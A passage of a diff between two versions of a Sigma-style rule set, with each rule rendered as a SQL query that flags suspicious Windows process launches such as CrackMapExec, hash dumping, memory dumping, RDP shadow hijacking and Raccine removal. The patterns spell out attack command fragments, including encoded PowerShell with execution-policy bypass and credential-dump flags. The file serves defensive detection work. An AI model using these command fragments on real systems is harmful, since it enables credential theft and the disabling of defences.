'%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution 
patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": 
"proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", - "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "status": "experimental", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" + "filename": "proc_creation_win_winrm_susp_child_process.yml" }, { - "title": "Exploit for CVE-2017-0261", - "id": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "title": "Suspicious PowerShell Parameter Substring", + "id": "36210e0d-5b19-485d-a087-c096088885f0", "status": "test", - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "tags": [ "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.t1059.001" ], "falsepositives": [ - "Several false positives identified, check for suspicious file names or locations (e.g. 
Temp folders)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\FLTLDR.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' 
OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine 
LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_0261.yml" + "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" }, { - "title": "Script Interpreter Execution From Suspicious Folder", - "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "title": "Potential 
MSTSC Shadowing Activity", + "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "status": "test", - "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "description": "Detects RDP session hijacking by using MSTSC shadowing", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.lateral_movement", + "attack.t1563.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" + "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" }, { - "title": "HackTool - Koadic Execution", - "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "title": "Raccine Uninstall", + "id": 
"a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", "status": "test", - "description": "Detects command line parameters used by Koadic hack tool", - "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate deinstallation by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_koadic.yml" + "filename": "proc_creation_win_susp_disable_raccine.yml" }, { - "title": "Suspicious Execution From GUID Like Folder Names", - "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", - "status": "experimental", - "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Runscripthelper.exe", + "id": 
"eca49c87-8a75-4f13-9c73-a5a29e845f03", + "status": "test", + "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.execution", + "attack.t1059", "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ - "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" + "filename": "proc_creation_win_lolbin_runscripthelper.yml" }, { - "title": "ImagingDevices Unusual Parent/Child Processes", - "id": "f11f2808-adb4-46c0-802a-8660db50fa99", + "title": "HackTool - SharpUp PrivEsc Tool Execution", + "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "status": "experimental", - "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of SharpUp, a tool for local privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.privilege_escalation", 
+ "attack.t1615", + "attack.t1569.002", + "attack.t1574.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND Image LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" + "filename": "proc_creation_win_hktl_sharpup.yml" }, { - "title": "HackTool - Quarks PwDump Execution", - "id": "0685b176-c816-4837-8e7b-1216f346636b", - "status": "experimental", - "description": "Detects usage of the Quarks PwDump tool via commandline arguments", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Memory Dump via RdrLeakDiag.EXE", + "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "status": "test", + "description": "Detects the use of the Microsoft Windows Resource Leak Diagnostic tool \"rdrleakdiag.exe\" to dump process memory", + "author": "Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\') AND (CommandLine LIKE '% -o %' ESCAPE '\\' OR CommandLine LIKE '% /o %' ESCAPE '\\') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% /p %' ESCAPE '\\')) OR ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' OR OriginalFileName = 'RdrLeakDiag.exe') AND (CommandLine LIKE '%fullmemdmp%' ESCAPE '\\' OR CommandLine LIKE '%/memdmp%' ESCAPE '\\' OR CommandLine LIKE '%-memdmp%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_quarks_pwdump.yml" + "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" }, { - "title": "HackTool - SharpLdapWhoami Execution", - "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", - "status": "experimental", - "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", - "author": "Florian Roth (Nextron Systems)", + "title": "Webshell Recon Detection Via CommandLine & Processes", + "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "status": "test", + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "author": "Cian Heasley, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Programs that use the same command 
line flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" + "filename": "proc_creation_win_webshell_recon_detection.yml" }, { - "title": "Wscript Execution from Non C Drive", - "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", - "status": "experimental", - 
"description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", - "author": "Aaron Herman", + "title": "HackTool - Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "stable", + "description": "Detects some Empire PowerShell UAC bypass methods", + "author": "Ecco", "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Legitimate scripts located on other partitions such as \"D:\"" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR 